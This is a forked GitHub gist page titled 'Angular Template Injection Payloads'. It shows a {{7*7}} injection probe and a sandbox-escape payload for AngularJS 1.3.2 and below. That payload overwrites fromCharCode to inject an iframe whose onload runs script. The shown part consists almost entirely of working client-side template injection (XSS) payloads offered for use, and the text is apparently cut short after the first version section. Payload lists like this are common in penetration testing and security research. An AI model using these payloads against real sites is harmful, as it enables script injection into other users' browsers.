Skip to content

Instantly share code, notes, and snippets.

View akurtasinski's full-sized avatar

Adrian akurtasinski

0 followers · 2 following
View GitHub Profile
@akurtasinski
akurtasinski / AngularTI.md
Created May 13, 2019 07:52 — forked from mccabe615/AngularTI.md
Angular Template Injection Payloads

1.3.2 and below

{{7*7}}

'a'.constructor.fromCharCode=[].join;
'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';